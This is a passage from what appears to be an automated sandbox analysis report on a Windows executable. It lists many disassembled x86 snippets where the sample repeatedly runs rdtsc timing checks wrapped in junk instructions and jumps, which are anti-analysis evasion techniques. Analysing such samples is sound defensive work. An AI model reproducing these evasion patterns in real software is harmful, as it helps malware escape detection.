00000014h 0x00000063 inc esi 0x00000064 push esi 0x00000065 ret 0x00000066 pop esi 0x00000067 ret 0x00000068 jg 00007F49E4E2C442h 0x0000006e mov dword ptr [ebp+12480619h], eax 0x00000074 push 00000004h 0x00000076 nop 0x00000077 jl 00007F49E4E2C440h 0x0000007d pushad 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 127188B second address: 127188F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 127188F second address: 1271893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1271B88 second address: 1271B9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1271B9D second address: 1271BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1271BA5 second address: 1271BD6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F49E47F2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jbe 00007F49E47F2146h 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jbe 00007F49E47F2169h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F49E47F2153h 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1271BD6 second address: 1271BDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1277068 second address: 127706F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 127706F second address: 1277095 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F49E4E2C436h 0x00000009 jmp 00007F49E4E2C442h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F49E4E2C436h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1277095 second address: 1277099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1276987 second address: 1276995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jno 00007F49E4E2C436h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1276995 second address: 127699B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 127699B second address: 12769A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12769A1 second address: 12769A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12769A6 second address: 12769AD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12769AD second address: 12769B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12769B6 second address: 12769C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F49E4E2C436h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12769C0 second address: 12769E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jg 00007F49E47F214Eh 0x0000000f jmp 00007F49E47F214Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F49E47F2146h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1276B6F second address: 1276B75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1276B75 second address: 1276B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1276B79 second address: 1276B7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 127875F second address: 127876F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F49E47F2146h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 127876F second address: 1278775 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 127E286 second address: 127E28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 127ED96 second address: 127EDA8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F49E4E2C436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F49E4E2C436h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 127FA7C second address: 127FA9E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F49E47F2146h 0x00000008 jmp 00007F49E47F2150h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F49E47F2148h 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 127FA9E second address: 127FAAF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 127FAAF second address: 127FAB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 127FAB3 second address: 127FAD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C43Dh 0x00000007 je 00007F49E4E2C436h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F49E4E2C436h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 127FAD2 second address: 127FAD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 127FDA7 second address: 127FDB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F49E4E2C436h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 127FDB3 second address: 127FDB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12845C3 second address: 12845C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1293591 second address: 12935C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F49E47F2155h 0x0000000f jmp 00007F49E47F2159h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 129186D second address: 1291871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1291871 second address: 1291875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1291875 second address: 129188B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49E4E2C43Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 129188B second address: 1291891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1291B27 second address: 1291B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1292104 second address: 129210E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F49E47F214Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1292D5F second address: 1292D75 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F49E4E2C43Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F49E4E2C436h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 129AB03 second address: 129AB18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F49E47F2146h 0x0000000a popad 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jng 00007F49E47F2160h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 129AB18 second address: 129AB33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49E4E2C444h 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 129AB33 second address: 129AB49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49E47F2150h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 129A707 second address: 129A718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jo 00007F49E4E2C436h 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 129A85F second address: 129A863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12A851D second address: 12A8521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12A8521 second address: 12A8525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12A8525 second address: 12A8539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F49E4E2C436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jng 00007F49E4E2C436h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12A8539 second address: 12A853E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12A853E second address: 12A8562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jl 00007F49E4E2C446h 0x00000010 jmp 00007F49E4E2C440h 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11CF191 second address: 11CF1BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F49E47F216Ah 0x0000000c jmp 00007F49E47F2154h 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 js 00007F49E47F2146h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12AA692 second address: 12AA69A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12B1E7F second address: 12B1E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12B591E second address: 12B5934 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F49E4E2C43Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F49E4E2C436h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12B5934 second address: 12B5938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12B7004 second address: 12B700A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12B700A second address: 12B7014 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F49E47F2152h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12B7014 second address: 12B701A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12BC8F9 second address: 12BC8FF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12BC8FF second address: 12BC904 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12BC904 second address: 12BC926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a jbe 00007F49E47F2146h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jnp 00007F49E47F214Ah 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12C4CE7 second address: 12C4CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F49E4E2C436h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12C4CF6 second address: 12C4D0A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F49E47F2146h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F49E47F2148h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12C34F6 second address: 12C34FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11CF185 second address: 11CF191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F49E47F214Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12C396F second address: 12C3973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12C3C7D second address: 12C3C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12C3C83 second address: 12C3C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F49E4E2C436h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12C3C8D second address: 12C3CAD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jnp 00007F49E47F2146h 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 jc 00007F49E47F214Ch 0x0000001a je 00007F49E47F2146h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12C94E1 second address: 12C94E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12C94E8 second address: 12C9515 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2154h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F49E47F2153h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12C9515 second address: 12C9519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12C9203 second address: 12C9207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13032FF second address: 1303305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 130D084 second address: 130D094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49E47F214Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 130F488 second address: 130F4BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C447h 0x00000007 jmp 00007F49E4E2C448h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1310FAC second address: 1310FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007F49E47F2146h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1310FBB second address: 1310FCE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F49E4E2C436h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 131278E second address: 13127C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F214Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F49E47F215Ah 0x0000000f jbe 00007F49E47F216Eh 0x00000015 jg 00007F49E47F214Eh 0x0000001b push edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13127C8 second address: 13127E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F49E4E2C440h 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 131F755 second address: 131F779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F49E47F2146h 0x0000000a jmp 00007F49E47F2156h 0x0000000f popad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 131F779 second address: 131F791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49E4E2C443h 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13EDFBC second address: 13EDFE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F49E47F2146h 0x00000009 jmp 00007F49E47F2154h 0x0000000e popad 0x0000000f jc 00007F49E47F214Eh 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13EDFE4 second address: 13EE004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F49E4E2C445h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13ED0E1 second address: 13ED0FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2157h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13ED0FC second address: 13ED118 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F49E4E2C447h 0x00000008 jmp 00007F49E4E2C441h 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13ED284 second address: 13ED28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13ED3DF second address: 13ED3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13ED801 second address: 13ED815 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F49E47F2146h 0x00000008 ja 00007F49E47F2146h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13ED9E8 second address: 13ED9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13ED9EC second address: 13ED9F6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F49E47F2146h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F249E second address: 13F2500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F49E4E2C43Dh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F49E4E2C438h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a jmp 00007F49E4E2C43Bh 0x0000002f push dword ptr [ebp+122D2708h] 0x00000035 mov edx, dword ptr [ebp+12452A59h] 0x0000003b call 00007F49E4E2C439h 0x00000040 push edi 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F2500 second address: 13F2504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
